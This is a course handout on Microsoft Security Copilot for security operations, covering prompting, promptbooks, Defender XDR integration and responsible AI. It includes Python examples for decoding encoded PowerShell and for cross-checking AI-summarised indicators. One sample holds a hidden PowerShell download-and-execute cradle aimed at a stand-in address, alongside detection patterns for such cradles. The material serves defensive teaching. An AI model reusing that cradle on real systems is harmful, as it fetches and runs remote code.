M10 · Security Copilot

Course: Microsoft Defender — Security Operations Fundamentals
Module duration: 3.5 hours (including lab)
Format: Instructor-led, hands-on

Currency note (as of June 2026): Microsoft Security Copilot changes rapidly — embedded experiences, plugins/agents, and the standalone portal evolve on roughly a monthly cadence, and some features are [PREVIEW]. Verify capabilities, availability, and portal paths against current Microsoft Learn before relying on specifics; never present a preview feature as generally available.


Learning objectives

By the end of this module you will be able to:

  1. Describe Security Copilot’s capabilities and the security scenarios it supports.
  2. Write effective prompts for security investigations, summarization, and guided response.
  3. Use Copilot embedded in Defender XDR to accelerate an incident investigation.
  4. Explain how Copilot integrates with Defender, Sentinel, Intune, and other signals.

1. What Security Copilot is

Microsoft Security Copilot is a generative-AI assistant for security operations. It applies a large language model, grounded in Microsoft’s threat intelligence and your own security data, to help analysts investigate, summarize, and respond — in natural language. Two ways to use it:

  • Standalone portal — a dedicated experience (a chat-like surface) for open-ended investigation, promptbooks, and cross-product work.
  • Embedded experiences — Copilot capabilities surfaced inside other products (e.g., Defender XDR, Microsoft Intune, Microsoft Entra), so help appears in the context where you are already working.

Capacity note: Security Copilot runs on provisioned Security Compute Units (SCU). If your lab lacks SCU capacity, use the recorded walkthrough fallback the instructor provides — the concepts and prompting skills transfer regardless.


2. Supported scenarios

Security Copilot is built for security work, not general chat. Core scenarios:

  • Incident summarization — turn a complex, multi-alert incident into a readable narrative.
  • Script analysis — explain what a suspicious PowerShell/command-line script does, in plain language.
  • Threat intelligence lookup — ask about an actor, malware family, vulnerability, or indicator.
  • Guided response — get suggested next steps for containment and remediation.
  • Report generation — produce summaries for different audiences (e.g., an executive briefing).
  • KQL query assistance — generate or explain Kusto queries for hunting (ties to M02/M04).
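The script-analysis scenario above is one where an analyst should check Copilot's explanation against the script itself. The following is an added example for this module, not Microsoft code and not part of Security Copilot: it decodes a PowerShell -EncodedCommand payload from a process command line and flags behaviours worth confirming by eye (download cradles, Invoke-Expression, hidden windows, Defender tampering) so that the explanation Copilot returns can be compared with what the script actually contains. The sample command line is constructed here, with an RFC 5737 documentation address rather than a real indicator.

```python
"""Decode a PowerShell -EncodedCommand payload and flag the behaviours an
analyst should confirm for themselves alongside Copilot's script explanation.

Added example for this module: not Microsoft code and not part of Security
Copilot. The sample command line is constructed here; the address in it is a
documentation range (RFC 5737), not a real indicator."""
import base64
import re

# Behaviours worth confirming by eye: (label, case-insensitive regex).
INDICATOR_PATTERNS = [
    ("Invoke-Expression (IEX)", r"\bIEX\b|Invoke-Expression"),
    ("download cradle", r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient"),
    ("nested base64", r"FromBase64String"),
    ("hidden / non-interactive window", r"-W(?:indowStyle)?\s+Hidden|-NonI\w*|-NoP\w*"),
    ("defender tampering", r"Add-MpPreference|Set-MpPreference"),
]
# -EncodedCommand and the common abbreviations PowerShell accepts for it (-e, -ec, -enc, ...).
ENCODED_ARG = re.compile(r"(?i)(?:^|\s)-e(?:c|n|nc|ncoded|ncodedcommand)?\s+([A-Za-z0-9+/=]+)")
URL = re.compile(r"https?://[^\s'\"()<>]+")


def extract_encoded_argument(cmdline: str):
    """Return the base64 blob passed to -EncodedCommand, or None if absent."""
    m = ENCODED_ARG.search(cmdline)
    return m.group(1) if m else None


def decode_encoded_command(b64: str) -> str:
    """PowerShell encodes the script as UTF-16LE before base64; reverse both steps."""
    return base64.b64decode(b64).decode("utf-16-le")


def find_indicators(text: str) -> list:
    """Labels of every indicator pattern that matches somewhere in text."""
    return [label for label, pat in INDICATOR_PATTERNS if re.search(pat, text, re.IGNORECASE)]


def analyze_command_line(cmdline: str) -> dict:
    """Decode (if encoded) and scan both the outer command line and the decoded script."""
    enc = extract_encoded_argument(cmdline)
    decoded = decode_encoded_command(enc) if enc else None
    scanned = cmdline if decoded is None else cmdline + "\n" + decoded
    return {
        "encoded": enc,
        "decoded": decoded,
        "indicators": find_indicators(scanned),
        "urls": URL.findall(scanned),
    }


# Constructed sample, shaped like the process command line shown in a Defender alert.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.23/stage.ps1')"
SAMPLE_CMDLINE = (
    "powershell.exe -NoP -W Hidden -EncodedCommand "
    + base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")
)

if __name__ == "__main__":
    result = analyze_command_line(SAMPLE_CMDLINE)
    print("decoded :", result["decoded"])
    print("flags   :", ", ".join(result["indicators"]))
    print("urls    :", result["urls"])
```

Run it on the command line from the alert, then ask Copilot to explain the same script: the decoded text and the flagged behaviours are the evidence you compare its explanation against. The indicator list is a starting point for the lab, not a detection rule.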

3. Prompting fundamentals

Copilot’s output quality depends on the prompt. A few durable principles:

  • Be specific and natural — state what you want plainly: “Summarize incident 1234 and list the affected users and devices.”
  • Set context — name the entity, time window, and goal. More relevant context → better grounding.
  • Iterate with follow-ups — Copilot keeps session context; refine with “now show only the high-severity alerts” rather than restarting.
  • Ask for the format you need — “as a bulleted executive summary,” “as a table of IOCs.”
  • Always verify — treat output as a draft to confirm, not ground truth (see §6).
Diagram (Mermaid source):

flowchart LR
    A["Set context<br/>(entity, time, goal)"] --> B["Ask a specific prompt"]
    B --> C["Review the response<br/>+ its evidence"]
    C --> D["Follow-up to refine"]
    D --> C
    C --> E["Verify before acting"]

Diagram alt text: A flow showing the prompting loop. Start by setting context — entity, time, goal. Then ask a specific prompt. Review the response and its evidence. A follow-up step loops back to reviewing as you refine. Finally, verify before acting.

Promptbooks

A promptbook is a saved sequence of prompts that automates a repeatable workflow — run the whole series with one action (e.g., a standard “triage this incident” sequence). Microsoft provides built-in promptbooks; you can create custom ones for your team’s recurring tasks. In the lab you will create a promptbook for a recurring investigation task.


4. Embedded Copilot in Defender XDR

Inside the Defender portal, Copilot accelerates the investigation you learned in M04:

  • Incident summary — an auto-generated narrative of the incident: what happened, which entities are involved, and the attack progression — drafted in seconds instead of read across many alerts.
  • Guided response — suggested response actions ranked for the situation.
  • Device/identity context — quick enrichment on the entities in the incident.

In the lab you will use embedded Copilot to summarize an active incident and generate a guided response, and use the standalone portal to analyze a suspicious script.


5. Integration signals

Copilot’s strength is breadth of grounding — it reasons over signals from across the Microsoft security estate (and beyond) via plugins/connectors. The set of available integrations evolves; the list below is current as of June 2026, so verify it against Microsoft Learn before relying on it:

  • Microsoft Defender XDR — incidents, alerts, device/entity data.
  • Microsoft Sentinel — SIEM incidents and log analytics (KQL).
  • Microsoft Intune — device compliance and configuration context.
  • Microsoft Entra — identity and identity-risk signals.
  • External threat intelligence — Microsoft Defender Threat Intelligence and other sources.

This cross-product reach is why Copilot can answer questions a single tool cannot — e.g., correlating an identity risk (Entra), a device state (Intune), and an incident (Defender XDR) in one summary.


6. Responsible AI

Generative AI assists judgment; it does not replace it.

  • Human-in-the-loop — review Copilot’s output and verify against the underlying evidence it cites before acting; do not auto-execute consequential actions on its say-so.
  • Know the limits — AI can be confidently wrong (“hallucinate”); confirm IOCs, technique mappings, and recommended actions against source data.
  • Data and governance — Copilot queries the connected products with the signed-in analyst’s own permissions, so it surfaces only what that analyst could already see in those products; it does not widen access. Prompts, and anything pasted into them, are processed and retained as session data in your tenant, so understand what a prompt exposes before you paste.

Carry-through: the verification discipline from M01 (map behaviors carefully) and M04 (read the evidence in the incident graph) applies directly — Copilot speeds the work, you still own the verdict.
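The "confirm IOCs against source data" step above can be made mechanical. The following is an added example for this module, not Microsoft code and not part of Security Copilot: it extracts the indicators (IPv4 addresses, domains, SHA-256 hashes) named in a Copilot-style incident summary, extracts the same kinds of indicator from the incident's own evidence records, and reports which claimed values the evidence does not contain, so they are questioned before they reach a ticket or a blocklist. The summary text and the evidence records are constructed for the example (documentation addresses from RFC 5737 and RFC 2606, and a made-up hash); the field names in the records are assumptions, not an alert schema.

```python
"""Cross-check the indicators a Copilot-style incident summary names against
the incident's own evidence, so anything the text asserts that the data does
not contain is caught before it reaches a ticket or a blocklist.

Added example for this module: not Microsoft code and not part of Security
Copilot. The summary text and evidence records are constructed; addresses are
from documentation ranges (RFC 5737, RFC 2606) and the hash is made up."""
import re

SHA256 = re.compile(r"\b[0-9a-f]{64}\b")
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# TLD list trimmed for the example; widen it for real use.
DOMAIN = re.compile(r"\b(?:[a-z0-9-]+\.)+(?:com|net|org|io|example)\b")


def refang(text: str) -> str:
    """Undo common defanging (hxxp, [.]) so evidence and summary compare equal."""
    return re.sub(r"hxxp", "http", text.replace("[.]", "."), flags=re.IGNORECASE)


def extract_iocs(text: str) -> dict:
    """Indicator values found in text, by type, normalised to lower case."""
    t = refang(text).lower()
    return {
        "sha256": set(SHA256.findall(t)),
        "ipv4": set(IPV4.findall(t)),
        "domain": set(DOMAIN.findall(t)),
    }


def cross_check(summary: str, evidence: list) -> dict:
    """Per IOC type: claimed values the evidence contains, and those it does not."""
    claimed = extract_iocs(summary)
    known = extract_iocs(" ".join(str(v) for rec in evidence for v in rec.values()))
    return {
        kind: {"supported": claimed[kind] & known[kind],
               "unsupported": claimed[kind] - known[kind]}
        for kind in claimed
    }


def unsupported_iocs(result: dict) -> set:
    """Every value the summary asserts that no evidence record contains."""
    return set().union(*(r["unsupported"] for r in result.values()))


FAKE_HASH = "a1b2c3d4" * 8  # 64 hex characters, constructed for the example

# Constructed evidence records; the field names are assumptions, not an alert schema.
EVIDENCE = [
    {"alert": "Suspicious PowerShell download", "device": "ws-0142",
     "remote_ip": "198.51.100.23", "remote_url": "hxxp://malware[.]example/stage.ps1",
     "file_sha256": FAKE_HASH},
    {"alert": "Discovery command", "device": "ws-0142", "command_line": "cmd.exe /c whoami"},
]

# Constructed summary in the style of an AI-generated incident narrative. The
# second address is deliberately absent from the evidence.
SAMPLE_SUMMARY = (
    "On ws-0142, powershell.exe downloaded stage.ps1 from 198.51.100.23 "
    f"(malware.example); the file hash was {FAKE_HASH}. A second C2 server at "
    "203.0.113.77 was also contacted."
)

if __name__ == "__main__":
    report = cross_check(SAMPLE_SUMMARY, EVIDENCE)
    for kind, r in report.items():
        print(kind, "supported:", sorted(r["supported"]), "unsupported:", sorted(r["unsupported"]))
    print("needs evidence before acting:", sorted(unsupported_iocs(report)))
```

An unsupported value is not automatically a hallucination; it may come from enrichment the summary drew on but the exported records do not include. The point is that it is a claim without evidence in front of you, and it gets checked before anyone blocks or escalates on it.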


7. Module summary

  • Security Copilot is a generative-AI assistant for SecOps, available standalone and embedded (Defender XDR, Intune, Entra), running on SCU capacity.
  • Supported scenarios include incident summarization, script analysis, threat-intel lookup, guided response, report generation, and KQL assistance.
  • Effective prompting is specific, context-rich, iterative, and format-aware; promptbooks save repeatable prompt sequences.
  • Embedded Copilot in Defender XDR provides incident summaries, guided response, and entity context.
  • Copilot integrates signals across Defender, Sentinel, Intune, Entra, and external TI.
  • Responsible AI: keep a human in the loop, verify output against evidence, and respect data governance.

Glossary (first-use acronyms in this module)

  • IOC — Indicator of Compromise.
  • KQL — Kusto Query Language.
  • LLM — Large Language Model.
  • SCU — Security Compute Unit (Security Copilot’s capacity/billing unit).
  • TI — Threat Intelligence.
  • XDR — Extended Detection and Response.

Sources

Living documents; “as of June 2026” stamps indicate currency. Mark any preview capability [PREVIEW] and verify GA status before teaching as generally available.

  1. Microsoft Learn — “What is Microsoft Security Copilot?” https://learn.microsoft.com/copilot/security/microsoft-security-copilot
  2. Microsoft Learn — “Get started with Microsoft Security Copilot.” https://learn.microsoft.com/copilot/security/get-started-security-copilot
  3. Microsoft Learn — “Create effective prompts” / prompting guidance. https://learn.microsoft.com/copilot/security/prompting-tips
  4. Microsoft Learn — “Using promptbooks.” https://learn.microsoft.com/copilot/security/using-promptbooks
  5. Microsoft Learn — “Microsoft Security Copilot in Microsoft Defender XDR.” https://learn.microsoft.com/copilot/security/microsoft-defender-xdr
  6. Microsoft Learn — “Manage plugins / integrations in Security Copilot.” https://learn.microsoft.com/copilot/security/manage-plugins
  7. Microsoft — “Responsible AI FAQ for Security Copilot.” https://learn.microsoft.com/copilot/security/responsible-ai-overview-security-copilot

M10 of 10 · Microsoft Defender — Security Operations Fundamentals · maps to curriculum.md → M10 learning objectives 1–4. Student handout — distribute freely to learners. No answer keys contained.